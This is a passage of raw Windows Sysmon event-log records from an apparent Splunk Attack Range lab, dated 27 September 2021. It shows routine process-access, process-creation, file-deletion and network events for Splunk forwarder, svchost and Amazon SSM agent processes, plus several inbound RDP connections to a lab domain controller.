09:10:28.489{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978561Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:28.489{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978560Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:28.489{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8A84-6151-BD79-00000000FD01}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978559Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:28.489{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A84-6151-BD79-00000000FD01}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978558Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:28.474{69CF5F33-8A84-6151-BD79-00000000FD01}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978557Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:28.395{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95AB156B428DF192F2B95245BC66249C,SHA256=2E97DA2BC056A0C5A53500BBBDC9DCABB69DD0F95109F4AF7546989253F45947,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978556Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:24.726{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59369-false10.0.1.12-8000- 10341000x8000000000000000978555Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:28.114{69CF5F33-8A83-6151-BC79-00000000FD01}27843232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001049894Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:26.776{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-64217-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001049893Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:26.133{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com49028-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049892Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:28.398{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E207F1FD252370AD052DC838D637FE0A,SHA256=346730757B3DDCEB63ACC4CE97E8E3662C7F143D517DC7911926E10007869BB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978587Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:29.848{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEF1CAD606A55B47968496CF7B329350,SHA256=885A80310037F4081D3683A8BB5B0767CFE64F3C07937DEC8A7AC8783E6F1CB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049898Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:29.650{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C87E2C69C1B117AC5AEFEE356D0B3DD9,SHA256=B62934C5EA3BD80BD0B0EE3C61E800CE750E4E70FD9A8A8FD7E2323F01F09809,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978586Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:29.692{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A840479B9805194E41272A59A941BF9B,SHA256=2CF87B9142FA1B05443158F5F9FC8DC95DF0292FDFC7CFC365190201E2945FF6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978585Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:29.348{69CF5F33-8A85-6151-BE79-00000000FD01}1264324C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978584Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:29.176{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A85-6151-BE79-00000000FD01}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978583Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:29.176{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978582Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:29.176{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978581Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:29.161{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978580Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:29.161{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978579Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:29.161{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978578Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:29.161{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978577Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:29.161{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978576Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:29.161{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978575Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:29.161{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978574Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:29.161{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8A85-6151-BE79-00000000FD01}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978573Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:29.161{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A85-6151-BE79-00000000FD01}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978572Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:29.162{69CF5F33-8A85-6151-BE79-00000000FD01}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001049897Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:27.742{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53346-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049896Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:29.231{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4306MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049900Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:30.655{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D84C3C9757281412E9884C6CCA30136,SHA256=894CE7C361AC9E9C0A3DB60F72F207BF8F1F31F73168325A13BE64C20A40B598,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049899Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:30.236{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4307MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049906Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:31.655{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80AA1A08B7BDA7BAB5158B0FEDE90FAF,SHA256=77D9CAB92EFAD761C1FFF5A19F9B3BCB0B9341DAC0343BD578F87A9C6244F73E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978588Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:31.083{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FC01434B45CD8A2A443BF1F68186D61,SHA256=E331954057ADD052CF6EE6D0FF16C4A6908F775CCE7C84173FF485A54271761D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049905Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:29.345{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49343-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001049904Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 